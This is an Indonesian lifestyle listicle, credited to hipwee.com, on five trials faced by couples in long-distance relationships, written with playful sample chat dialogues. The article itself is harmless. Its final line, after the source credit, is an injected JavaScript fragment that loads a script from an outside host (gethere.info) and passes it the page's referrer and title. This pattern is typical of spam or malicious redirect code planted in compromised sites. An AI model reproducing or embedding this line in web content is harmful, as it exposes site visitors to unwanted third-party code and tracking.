Kalau Kamu Kuat Hadapin Tantangan Ini, Pasti Kamu Pasangan LDR Sejati!

Sayang sama orang yang jauh dari kita, memang banyak cobaannya. Karena gak bisa ketemu terus-terusan pasti pasangan yang menjalani LDR ini banyak mengeluh dan banyak sekali tantangannya. Mulai dari biaya pacaran yang membengkak mahal, sampai perasaan insecure saat kita tak bisa ada di sampingnya.

Pasangan LDR yang bertahan pasti punya mental lebih hebat dari pasangan kebanyakan.

Buat yang belum percaya, artikel satu ini wajib kamu baca. Tantangan-tantangan di bawah ini, cuma pasangan LDR sejati yang kuat menjalani!

1. Pasangan LDR paling memahami, sulitnya nggak melihat wajah saat berkomunikasi. Salah paham rawan terjadi

Sumber: favim.com

“Kok gara-gara itu doang kamu marah sih?”

“Lah, siapa yang marah? Aku lagi senyum-senyum kok ini -____-“

Mengobrol tanpa melihat langsung ekspresi wajah lawan bicara itu… susah. Apalagi kalau lawan bicaranya pasangan kamu sendiri. Bisa berabe kalau kesalahpahaman terjadi.

Saat mereka lagi ketawa-ketawa di chat, kita justru bisa mengira mereka lagi bete. Waktu mereka bete beneran, eh kita malah bercanda dan bikin mereka tambah bete. Kalau kalian nggak LDR sih gampang, berantem bisa selesai dengan senyum manis dan sedikit genggaman tangan. Tapi kalau kalian LDR dan berantemnya di WhatsApp? Yah…

Makanya, pasangan LDR pasti punya stok kesabaran ekstra. Mereka paham kalau komunikasi dari pasangan harus diinterpretasikan sebenar-benarnya. Jangan sampai deh, muncul sesi berantem nggak penting yang bikin lelah mereka berdua~

2. Pasangan LDR paling tahu bahayanya sikap ngarep. Apalagi saat yang akhirnya terjadi kurang sesuai dengan ekspektasi

Lah, kok nggak sesuai ekspektasi gini?

Pasangan biasa:

“Sayang, aku nggak bisa ke kosan kamu malem ini. Besok pagi aja ya, aku bawain sarapan deh.”

“Iyaaa nggak papa kok. Besok kamu mau bawain apaa? *emoji tersipu malu*

Pasangan LDR:

“Sayang, aku nggak jadi bisa ke Jakarta minggu depan. Tiba-tiba disuruh kantor ke Lombok nih… Maaf banget ya… :((”

“Lho? Tapi kan kita baru bisa ketemu lagi bulan depaaan T____T”

PS: ya udah. Daripada baper mulu, mending nggak usah ngarep sama sekali deh dari awal.

3. Pasangan LDR gampang bete kalau ke mana-mana sendiri. Kadang sampai mikir gini: “Sebenarnya aku punya pacar nggak sih…”

Sumber: spicy.robadadonne.it

“Punya pacar, nggak punya pacar, kok rasanya sama aja?”

Bukannya nggak punya pacar, tapi pacarnya lagi nggak di sini. Orang yang spesial itu nggak bisa ada di samping untuk menemani. Karena itu, pasangan yang LDR pasti sering ke mana-mana sendiri.

Asyik sih. Artinya kamu bisa mengeksplorasi duniamu sendiri, lebih dekat sama diri sendiri, bebas melakukan hobi. Tapi, kamu juga nggak punya seseorang yang siap datang saat kamu bosan dan sepi.

Makanya, butuh mental yang kuat untuk bertahan di hubungan jarak jauh ini. Mudah merasa sepi, berarti kamu harus nyaman hanya ditemani diri sendiri!

4. “Udah LDR-an dari kapan?” “Mau kayak gini terus sampai kapan?” Duh, kenapa sih semua orang tanya hal yang sama?

Sebenarnya, pertanyaan itu sah-sah aja. Namanya juga orang, pasti mau tahu nasib hidup pribadimu ke depannya. Tapi kalau kamu lagi bete sama pasangan, ditanya “Mau LDR terus sampai kapan?” bisa bikin tambah bete. Apalagi kalau yang tanya orang tua atau keluarga.

Kalau udah begini sih, yang paling aman adalah pasang senyum termanis sambil bilang “Nggak tahu. Doain aja.”

Ah, kamu. Sabar-sabar ya…

5. Pasangan LDR juga paling bergantung sama teknologi! Buffer dikit, pasti baper sepanjang hari

Jam 8 pagi:

Pacar: “Sayang, kamu lihat video yang ini deh. Lucu banget lho!”

Jam 8 malem:

Pacar: “Sayang, udah lihat videonya belum? Lucu kaaaan?”

Kamu: “Emm… tadi buffering melulu sih sayang pas aku play videonya. Jadi belum nonton deh…”

Pacar: *baper seharian*

Familiar sama adegan ini? Ah, pasangan LDR memang yang paling tergantung sama kecanggihan teknologi. Ada halangan sedikit, seperti buffering saat streaming, pasti bikin baper sepanjang hari. Rasanya kayak udah melewatkan kesempatan untuk berbagi sesuatu yang spesial dengan dia yang kamu sayangi.

Ah, LDR memang macam-macam cobaannya. Kamu yang masih bertahan sampai sekarang, tetap kuat, ya. Kamu adalah dua orang yang lebih kuat dari pasangan-pasangan biasa!

 

Sumber: www.hipwee.com

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;